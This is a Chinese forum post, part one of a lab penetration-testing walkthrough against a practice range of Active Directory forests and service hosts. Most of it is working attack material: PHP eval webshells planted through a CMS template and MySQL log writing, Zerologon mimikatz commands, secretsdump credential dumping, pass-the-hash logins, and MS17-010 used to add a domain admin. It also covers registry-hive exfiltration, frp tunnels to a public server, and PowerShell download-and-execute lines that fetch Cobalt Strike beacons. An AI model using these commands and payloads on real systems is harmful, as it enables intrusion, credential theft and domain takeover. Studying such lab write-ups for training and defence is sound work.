QQ登录

只需一步,快速开始

切换到宽版 切换风格

电脑疯子技术论坛|电脑极客社区

实战渗透域森林+服务森林(上)

[复制链接]
92 0
首先感谢大余师父搭的内网渗透靶场 靶场总共分为两部分,一部分为域渗透。另一部分为服务攻防。整个靶场攻占
涉及到的技术包括代理 域渗透攻击 置零攻击 域信任 票据传递 哈希传递等 服务渗透攻击(Shiro反序列化Struts2远
程代码执行 ThinkPHP远程代码执行等。我将从DAYU子域web服务器入手进行渗透。目标包括DAYU主域控DAYU
辅域控 DAYU子域控 独立域控 安全域控以及各类服务主机。具体靶场图如下:

1631200076_613a234ccd57c214448e2.png

0x01 配置代理

一、设置Proxifier

在mac下通过Proxifier设置全局代理,通过socks进入目标环境
  1. x.x.x.x 10000
复制代码

QQ截图20210918141925.png

二、配置hosts文件

在/etc/host下配置
  1. 192.168.73.137 www.dayugs.com
复制代码

QQ截图20210918142024.png

0x02 攻击DAYU子域普通域客户机

一、弱口令爆破

访问http://www.dayugs.com,源码为yxcms
1631200128_613a238021f2af31e8244.png

通过资料查询 可以拿到yxcms的后台地址http://你的域名/index.php?r=admin/index/login
账号密码为admin/123456

QQ截图20210918142244.png

那么访问http://www.dayugs.com/index.php?r=admin/index/login,即可访问到后台地址

9999.jpg

之后尝试弱口令爆破(虽然已经知道默认账号密码) 首先该后台存在验证码 但是经测试它是可以重复利用的

9998.png

之后将数据包放入intruder中进行测试

9997.png

成功爆出密码为123456

9996.png

通过该账号密码登录后台

9993.png

选择前台模版,在index_index.php中插入一句话木马

9992.png

  1. <?php @eval($_POST['mac'])?>
复制代码

9991.png


二、webshell上线

保存该配置,并通过蚁剑上线webshell

9990.png

测试连接 成功上线

8999.png

三、CS上线

通过命令查看系统信息,目标web机器为64位操作系统
  1. systeminfo
复制代码

8998.png

通过ping命令发现该web服务器出网

8997.png

在V-P-S上通过Cobalt Strike生成windows后门
这里使用CS可能会遇到这几个问题
1、 java未安装
解决方法:teamserver基于java,所以需要先安装java
  1. yum install java
复制代码

8996.png

2、客户端无法连接问题
解决方法:
在控制台上开放50050端口

8995.png

关闭linux防火墙
  1. systemctl stop firewalld.service
复制代码

服务端开启CS
  1. ./teamserver x.x.x.x adminadmin
复制代码

连接Cobalt Strike,配置IP和账号密码

8993.png

设置监听器并生成后门

8992.png

上传后门并执行上线CS

8991.png

这里又遇到了问题,执行后CS不上线,发现还是腾讯云控制台的问题,需放通全部端口

8990.png

之后可以成功上线

8989.png

四、通过MS14-068提权

通过dayu插件进行MS14-068提权

8988.png

选择监听器,运行后提权

100.jpg

成功提权web服务器的system权限

99.png

0x03 攻击DAYU子域控服务器

一、web服务器信息收集

本机信息收集存在双网卡,分别为192.168.73.0/24以及10.10.10.0/24网段

98.png

  1. 主机名 : web
  2. 网卡1 : 192.168.73.137
  3. 网卡2 : 10.10.10.101
  4. 默认网关 : 10.10.10.1
  5. 域名 : ziyu.dayu.com
复制代码

上传nbtscan后对两个网段进行扫描,发现192.168.73.0/24为外网网段 10.10.10.0/24则为内网网段 于是重点关注后者

97.png

96.png

93.png

发现三台DC 分别是10.10.10.5、10.10.10.6、10.10.10.66 分别对应域为DAYU、DAYU、AQ 唯独没有发现当
前子域的域控。于是尝试ping该域。获得IP地址 为10.10.10.6

92.png

91.png

通过信息整合,10.10.10.0/24网段下主机信息收集如下
  1. 10.10.10.5 : DAYU主域控
  2. 10.10.10.6 : DAYU辅域控
  3. 10.10.10.10 : DAYU子域控
  4. 10.10.10.66 : AQ域控
  5. 10.10.10.90 : DAYU普通域用户
  6. 10.10.10.101 : DAYU子域普通用户(本机)
复制代码

二、检查是否存在CVE-2020-1472漏洞

在文件管理中上传一个mimikatz.exe
90.png

执行命令检测是否存在CVE-2020-1472
  1. shell mimikatz.exe "lsadump::zerologon /target:10.10.10.10 /account:ZIYU$" "exit"
复制代码

89.png

发现存在该漏洞,可以通过以下命令进行置零攻击
  1. shell mimikatz.exe "lsadump::zerologon /target:10.10.10.10 /account:ZIYU$ /exploit" "exit"
复制代码

88.png

三、通过frp建立隧道

(一)相关配置

配置frps.ini和frpc.ini

frps.ini
  1. [common]
  2. bind_addr = 0.0.0.0
  3. bind_port = 7000
复制代码

frpc.ini
  1. [common]
  2. server_addr = 1.117.58.131
  3. server_port = 7000
  4. [http_proxy]
  5. type = tcp
  6. remote_port = 6000
  7. plugin = socks5
复制代码

(二)命令执行

向V-P-S上传frps.ini和frps,向web服务器上传frpc和frpc.ini,并通过命令执行,建立隧道

87.png

86.png

设置proxychains.conf
83.png

通过代理远程连接10.10.10.10的3389端口,frp隧道建立成功

82.png

四、获取管理员hash值

通过impacket-secretsdump对子域控进行无密码hash读取
  1. proxychains impacket-secretsdump -no-pass -just-dc ziyu.dayu.com/ZIYU\$@10.10.10.10
复制代码

81.png

五、CS上线

在CS上建立中转监听

80.png

设置名字和监听地址

69.png

之后生成mac.exe木马

68.png

(一)利用wmicexec.py进行攻击
  1. proxychains python3 wmiexec.py -hashes :a8ad79b7b2c65986
  2. 58ca0932cbf01e40 ./Administrator@10.10.10.10
复制代码

66.png

上传木马mac.exe并执行
  1. put mac.exe
复制代码

63.png

但是这里无法上线,可能是防火墙开着,于是使用taowu的插件将web服务器的防火
墙进行关闭,之后成功上线CS。

62.png
61.png

(二)利用永恒之蓝进行攻击

进入msf后
  1. msf > use auxiliary/admin/smb/ms17_010_command
  2. msf > setg Proxies socks5:1.117.58.131:6000
  3. msf > setg ReverseAllowProxy true
  4. msf > set command whoami
  5. msf > set rhosts 10.10.10.10
  6. msf > run
复制代码

60.png

通过永恒之蓝创建域管理员
  1. net user mac1 QWEasd123 /add /domain
  2. net group "domain admins" mac1 /add /domain
  3. net user /domain
  4. net user mac1 /domain
复制代码

39.png

36.png

可以看到mac1已经是域管账号了,在CS中通过IPC连接域控
  1. shell net use \\10.10.10.10\ipc$ "QWEasd123" /user:mac1
  2. shell net use
  3. shell dir \\10.10.10.10\c$
复制代码

33.png

32.png

之后在web服务器上传木马再通过IPC上传木马
  1. shell copy mac1.exe \\10.10.10.10\c$
复制代码

六、恢复hash

在CS的域控中执行操作:

(一)将system.save、sam.save、security.save三个文件拷贝到本地

先将三个文件保存下来
  1. reg save HKLM\SYSTEM system.save
  2. reg save HKLM\SAM sam.save
  3. reg save HKLM\SECURITY security.save
复制代码

31.png

在kali使用wmic获取shell操作(可能会掉线)
下载
  1. get system.save
  2. get sam.save
  3. get security.save
复制代码

删除域控中的文件
  1. del /f system.save
  2. del /f sam.save
  3. del /f security.save
复制代码

30.png

二)secretsdump获取原hash

使用impacket中的secretsdump,从上面得到的几个文件中还原账户哈希值。
  1. impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
复制代码

29.png

得到$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:6cb780aa112acd1199cb9fd57a24fd02

(三)恢复密码
  1. proxychains python3 reinstall_original_pw.py ZIYU 10.10.10.10
  2. 6cb780aa112acd1199cb9fd57a24fd02
复制代码

显示Success! DC machine account should be restored to it's original value. You might wa
nt to secretsdump again to check.,说明恢复成功

28.png

也可以通过hex来进行恢复,命令如下
  1. proxychains python3 restorepassword.py ZIYU0\ZIYU -target-ip 10.10.10.10 -hexpass [hex]
复制代码

检查情况
  1. net group "domain controllers" /domain
复制代码

七、子域信息收集

通过ipconfig和systeminfo发现该域控为win server 2016系统 且存在两个网卡
分别为10.10.10.0/24和10.12.10.0/24

0000.png

1631208910_613a45ce82fa24982414a.png

1631208917_613a45d51823d19a8ca27.png

上传nbtscan,并对新网段进行扫描

1631208922_613a45dab84c559557b1e.png

发现10.12.10.3,为独立域的域控

1631208930_613a45e273492c4472f27.png

0x04 攻击DAYU父域主域控服务器

一、利用CVE-2020-1472漏洞

上传mimikatz对父域控进行置零漏洞探测
  1. shell mimikatz.exe "lsadump::zerologon /target:10.10.10.5 /accou
  2. nt:WIN-AMJ9T9TL123$" "exit"
复制代码

100.png

通过探测,发现存在该漏洞,于是执行置零攻击
  1. shell mimikatz.exe "lsadump::zerologon /target:10.10.10.5 /acc
  2. ount:WIN-AMJ9T9TL123$ /exploit" "exit"
复制代码

99.png

通过impacket-secretsdump导出hash值
  1. proxychains impacket-secretsdump -no-pass -just-dc WIN-AMJ9
  2. T9TL123.dayu/WIN-AMJ9T9TL123\$@10.10.10.5
复制代码

98.png

拿到hash值,为99b81196c641b05ce3cb7fcd7c27e094

二、利用wmiexec空密码登录

使用wmiexec登陆进Administrator账户
  1. proxychains python3 wmiexec.py -hashes :99b81196c641b05ce3cb7fc
  2. d7c27e094 ./Administrator@10.10.10.5
复制代码

96.png

三、CS上线

在CS上建立中转监听,同时生成木马mac2.exe

93.png

92.png

通过wmicexec.py上传mac2.exe

91.png

成功上线CS

90.png

0x05 攻击DAYU父域辅域控服务器

一、利用CVE-2020-1472漏洞

上传mimikatz对父域控进行置零漏洞探测
  1. shell mimikatz.exe "lsadump::zerologon /target:10.10.10.6 /account:FUYU$" "exit"
复制代码

89.png

说明该辅域也是存在该漏洞的 那么可以通过置零攻击来获取administrator的shell但是因为辅域和主
域的hash值相同,那么可以通过wmiexec直接获取shell

二、利用wmiexec登录
  1. proxychains python3 wmiexec.py -hashes :99b81196c641b05ce3cb7fcd7c
  2. 27e094 ./Administrator@10.10.10.6
复制代码

88.png

三、CS上线

与进攻父域的主域控一样,上传mac2.exe
  1. put mac2.exe
  2. mac2.exe
复制代码

86.png

执行后成功上线CS

83.png

0x06 攻击DAYU父域普通域客户机

一、信息收集

使用nmap对其进行端口探测,发现存在一个8080端口
  1. proxychains nmap -sT -sV -Pn --open -p 8080,3306,6379,80,1433,27017 10.10.10.90
复制代码

82.png

发现只有8080端口是开放的,通过firefox对其进行访问,发现目标站点使用的JBoss中间件
  1. proxychains firefox http://10.10.10.90:8080
复制代码

81.png

二、JBoss利用并上线CS

工具地址:https://github.com/joaomatosf/jexboss

下载利用工具并对目标进行JBoss漏洞探测
  1. git clone https://github.com/joaomatosf/jexboss
  2. proxychains python jexboss.py -host http://10.10.10.90:8080
复制代码

80.png

选择yes,成功获取shell

69.png

将mac2.exe放入10.10.10.101这台web服务器上

68.png

利用powershell进行下载执行
  1. powershell.exe -Command (new-object System.Net.WebClient).Download
  2. File('http://10.10.10.101/mac2.exe','mac2.exe');start-process mac2.exe
复制代码

66.png

成功上线CS

63.png

0x07 攻击安全域域控服务器

一、信息收集

使用nmap对其进行端口探测,发现存在一个8080端口
  1. proxychains nmap -sT -sV -Pn --open -p 8080,3306,6379,80,1433,27017 10.10.10.66
复制代码

62.png

发现80、3306、8080端口是开放的,通过firefox对8080端口进行访问
  1. proxychains firefox http://10.10.10.66:8080
  2. proxychains firefox http://10.10.10.66:80
复制代码

80端口为phpstudy默认界面 8080端口为tomcat的管理界面 访问登录口http://10.10.10.66:8080/manager/html报错

61.png

60.png

39.png

对8080端口进行目录扫描,发现http://10.10.10.66:8080/shiro为shiro框架

38.png

二、shiro反序列化利用并上线

工具:https://github.com/zhzyker/shiro-1.2.4-rce

验证漏洞是否存在
  1. git clone https://github.com/zhzyker/shiro-1.2.4-rce.git
  2. cd shiro-1.2.4-rce
  3. proxychains python3 shiro-1.2.4_rce.py http://10.10.10.66:8080/shiro/
复制代码

其中出现问题,通过以下方式解决报错No module named 'Crypto'
  1. pip install pycryptodome
  2. pip install crypto
  3. pip install pycrypto
复制代码

36.png

在执行前需要先将key_list修改

32.png

31.png

通过powershell下载mac2.exe并执行
  1. powershell.exe -Command (new-object System.Net.WebClient).Downloa
  2. dFile('http://10.10.10.101/mac2.exe','mac2.exe');start-process mac2.exe
复制代码

但是显示key错误,无法上线

30.png

三、mysql日志写入shell并上线CS

通过目录扫描发现http://10.10.10.66:80/phpmyadmin,通过弱口令成功登录
  1. proxychains firefox http://10.10.10.66:80/phpmyadmin
复制代码

29.png

通过into outfile写入shell
  1. show global variables like "%secure_file_priv%";
复制代码

28.png

结果为null,表示无法导入导出,于是查看日志
  1. show variables like "general%";
复制代码

26.png

可以看到日志已开启,也可以修改日志文件位
  1. set global general_log="ON";
  2. set global general_log_file='C:/phpStudy/WWW/mac1.php';
  3. show variables like "general%";
复制代码

22.png

写入一句话木马
  1. select '<?php @eval($_POST[mac]);?>'
复制代码

21.png

访问http://10.10.10.66/mac.php,成功写入

20.png

连接蚁剑,设置代理为1.117.58.131 6000,成功上线

19.png

上传mac2.exe并执行,成功上线CS

18.png
16.png

0x08 攻击安全域涉密客户机

一、信息收集

通过对涉密域进行信息收集,上传fscan

13.png

扫描结果如下

12.png

存在涉密域,IP为201.1.10.206,且上面部署了http服务

二、构建二级frp

(一)相关配置

安全域frpc.ini配置如下
  1. [common]
  2. server_addr = 10.10.10.101
  3. server_port = 12000
  4. [http_proxy]
  5. type = tcp
  6. remote_port = 1096
  7. plugin = socks5
复制代码

Web服务器frps.ini配置如下
  1. [common]
  2. bind_addr = 10.10.10.101
  3. bind_port = 12000
复制代码

Web服务器frpc.ini配置如下
  1. [common]
  2. server_addr = 1.117.58.131
  3. server_port = 12000
  4. [http_proxy]
  5. type = tcp
  6. local_ip = 10.10.10.101
  7. local_port = 1096
  8. remote_port = 1096
复制代码

公网服务器frps.ini配置如下
  1. [common]
  2. bind_addr = 0.0.0.0
  3. bind_port = 12000
复制代码

(二)命令执行

首先先开启服务端的frp,在web服务器和公网服务器下执行如下命令
  1. frps.exe -c frps.ini
  2. ./frps -c frps.ini
复制代码

11.png

之后在安全域中执行
  1. frpc.exe -c frpc.ini
复制代码

10.png

最后在web服务器中执行
  1. frpc.exe -c frpc.ini
复制代码

9.png

注意:需要开启proxy success成功才行

在proxychains添加代理
  1. vim /etc/proxychains.conf
复制代码

8.png

三、mysql弱口令连接并上线CS

通过访问http://201.1.10.206:8080
  1. proxychains firefox http://201.1.10.206:8080
复制代码

7.png

访问http://201.1.10.206:8080/manager/html不可进入
6.png

于是开启msf,通过设置代理对目标机器进行mysql密码爆破
  1. msfconsole
  2. msf > use auxiliary/scanner/mysql/mysql_login
  3. msf > setg Proxies socks5:1.117.58.131:1096
  4. msf > setg ReverseAllowProxy true
  5. msf > set rhosts 201.1.10.206
  6. msf > set PASSFILE xxx
  7. msf > exploit
复制代码

爆破得到密码为root,同时直接登录mysql
  1. proxychains mysql -u root -proot -h201.1.10.206
复制代码

查看是否拥有写入文件的权限和写入位置,空表示可以写入任意位置
  1. show global variables like '%secure_file_priv%';
复制代码

写入木马到网站目录下
  1. select '<?php @eval($_POST[mac]);?>' into outfile 'C:/phpStudy/WWW/mac1.php';
复制代码

5.png

于是访问http://201.1.10.206/mac1.php,访问成功,说明存在

4.png

连接蚁剑,设置代理为1.117.58.131 1096,成功连接

3.png

之后在安全域(201.1.10.5)中设置中转监听,同时生成木马mac3.exe

2.png
1.png

上传mac3.exe并执行

0.png

成功上线CS

00.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

8001

主题
精彩推荐
热门资讯
网友晒图
图文推荐
Pcgho! X3.4

© 2020 Comsenz Inc.